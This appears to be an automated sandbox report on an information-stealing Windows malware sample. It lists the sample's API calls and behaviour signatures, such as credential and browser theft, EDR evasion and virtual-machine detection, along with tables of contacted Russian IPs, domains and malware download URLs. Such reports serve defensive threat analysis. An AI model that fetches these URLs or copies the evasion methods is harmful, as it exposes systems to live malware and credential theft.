Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC80B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 1_2_6BC80B40
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBA8EA0 sqlite3_clear_bindings, 1_2_6BBA8EA0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC80D60 sqlite3_bind_parameter_name, 1_2_6BC80D60
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC80C40 sqlite3_bind_zeroblob, 1_2_6BC80C40
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBA63C0 PR_Bind, 1_2_6BBA63C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB322D0 sqlite3_bind_blob, 1_2_6BB322D0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBA60B0 listen,WSAGetLastError, 1_2_6BBA60B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBAC030 sqlite3_bind_parameter_count, 1_2_6BBAC030
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBA6070 PR_Listen, 1_2_6BBA6070
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBAC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 1_2_6BBAC050
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBA6410 bind,WSAGetLastError, 1_2_6BBA6410
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432397 Sample: kO1P1YnLst.exe Startdate: 27/04/2024 Architecture: WINDOWS Score: 100 85 download.iolo.net 2->85 87 westus2-2.in.applicationinsights.azure.com 2->87 89 8 other IPs or domains 2->89 125 Snort IDS alert for network traffic 2->125 127 Found malware configuration 2->127 129 Malicious sample detected (through community Yara rule) 2->129 131 18 other signatures 2->131 9 kO1P1YnLst.exe 3 11 2->9         started        14 run.exe 2 2->14         started        signatures3 process4 dnsIp5 91 185.172.128.90, 49730, 80 NADYMSS-ASRU Russian Federation 9->91 93 185.172.128.228, 49731, 80 NADYMSS-ASRU Russian Federation 9->93 95 2 other IPs or domains 9->95 69 C:\Users\user\AppData\Local\Temp\u5c4.3.exe, PE32 9->69 dropped 71 C:\Users\user\AppData\Local\Temp\...\run.exe, PE32 9->71 dropped 73 C:\Users\user\AppData\Local\...\relay.dll, PE32 9->73 dropped 75 2 other malicious files 9->75 dropped 133 Detected unpacking (overwrites its own PE header) 9->133 16 u5c4.0.exe 58 9->16         started        21 run.exe 6 9->21         started        23 u5c4.3.exe 20 8 9->23         started        25 WerFault.exe 21 16 9->25         started        135 Maps a DLL or memory area into another process 14->135 137 Found direct / indirect Syscall (likely to bypass EDR) 14->137 27 cmd.exe 14->27         started        file6 signatures7 process8 dnsIp9 77 185.172.128.76, 49733, 80 NADYMSS-ASRU Russian Federation 16->77 79 185.172.128.203 NADYMSS-ASRU Russian Federation 16->79 53 C:\Users\user\AppData\...\IIDHJDGCGD.exe, PE32 16->53 dropped 55 C:\Users\user\AppData\Local\...\tiktok[1].exe, PE32 16->55 dropped 57 C:\Users\user\AppData\...\softokn3[1].dll, PE32 16->57 dropped 65 11 other files (7 malicious) 16->65 dropped 97 Detected unpacking (changes PE section rights) 16->97 99 Detected unpacking (overwrites its own PE header) 16->99 101 Tries to steal Mail credentials (via file / registry access) 16->101 111 8 other signatures 16->111 29 cmd.exe 16->29         started        31 WerFault.exe 16->31         started        59 C:\Users\user\AppData\Roaming\...\relay.dll, PE32 21->59 dropped 61 C:\Users\user\AppData\...\UIxMarketPlugin.dll, PE32 21->61 dropped 103 Maps a DLL or memory area into another process 21->103 105 Found direct / indirect Syscall (likely to bypass EDR) 21->105 33 cmd.exe 4 21->33         started        81 svc.iolo.com 20.157.87.45 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->81 107 Checks if the current machine is a virtual machine (disk enumeration) 23->107 37 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 23->37         started        63 C:\Users\user\AppData\Local\Temp\khjsru, PE32 27->63 dropped 109 Writes to foreign memory regions 27->109 39 conhost.exe 27->39         started        41 MSBuild.exe 27->41         started        file10 signatures11 process12 file13 43 IIDHJDGCGD.exe 29->43         started        46 conhost.exe 29->46         started        67 C:\Users\user\AppData\Local\Temp\pasb, PE32 33->67 dropped 113 Writes to foreign memory regions 33->113 115 Found hidden mapped module (file has been removed from disk) 33->115 117 Maps a DLL or memory area into another process 33->117 48 MSBuild.exe 33->48         started        51 conhost.exe 33->51         started        119 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->119 121 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 37->121 123 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 37->123 signatures14 process15 dnsIp16 139 Multi AV Scanner detection for dropped file 43->139 83 91.215.85.66 PINDC-ASRU Russian Federation 48->83 141 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 48->141 143 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 48->143 145 Tries to harvest and steal browser information (history, passwords, etc) 48->145 signatures17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.172.128.90
 unknown Russian Federation
50916 NADYMSS-ASRU true
185.172.128.228
 unknown Russian Federation
50916 NADYMSS-ASRU false
185.172.128.203
 unknown Russian Federation
50916 NADYMSS-ASRU false
20.157.87.45
 svc.iolo.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
91.215.85.66
 unknown Russian Federation
34665 PINDC-ASRU true
185.172.128.76
 unknown Russian Federation
50916 NADYMSS-ASRU true
176.97.76.106
 note.padd.cn.com United Kingdom
43658 INTRAFFIC-ASUA false
185.172.128.59
 unknown Russian Federation
50916 NADYMSS-ASRU false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
iolo0.b-cdn.net 169.150.236.100 true
note.padd.cn.com 176.97.76.106 true
svc.iolo.com 20.157.87.45 true
fp2e7a.wpc.phicdn.net 192.229.211.108 true
download.iolo.net unknown unknown
westus2-2.in.applicationinsights.azure.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08 true
  • Avira URL Cloud: safe
 unknown
http://185.172.128.228/BroomSetup.exe false
  • Avira URL Cloud: safe
 unknown
http://185.172.128.76/3cd2b41cbde8fc9c.php true
  • Avira URL Cloud: safe
 unknown
http://185.172.128.76/15f649199f40275b/sqlite3.dll true
  • Avira URL Cloud: safe
 unknown
http://185.172.128.76/15f649199f40275b/softokn3.dll true
  • Avira URL Cloud: safe
 unknown
http://185.172.128.59/syncUpd.exe false
  • Avira URL Cloud: malware
 unknown
http://185.172.128.76/15f649199f40275b/nss3.dll true
  • Avira URL Cloud: safe
 unknown
http://185.172.128.76/15f649199f40275b/mozglue.dll true
  • Avira URL Cloud: safe
 unknown
http://185.172.128.203/tiktok.exe false
  • Avira URL Cloud: malware
 unknown
http://185.172.128.228/ping.php?substr=eight false
  • Avira URL Cloud: malware
 unknown
http://185.172.128.76/15f649199f40275b/msvcp140.dll true
  • Avira URL Cloud: safe
 unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx false
    		high
    http://note.padd.cn.com/1/Package.zip false
    • Avira URL Cloud: safe
    		 unknown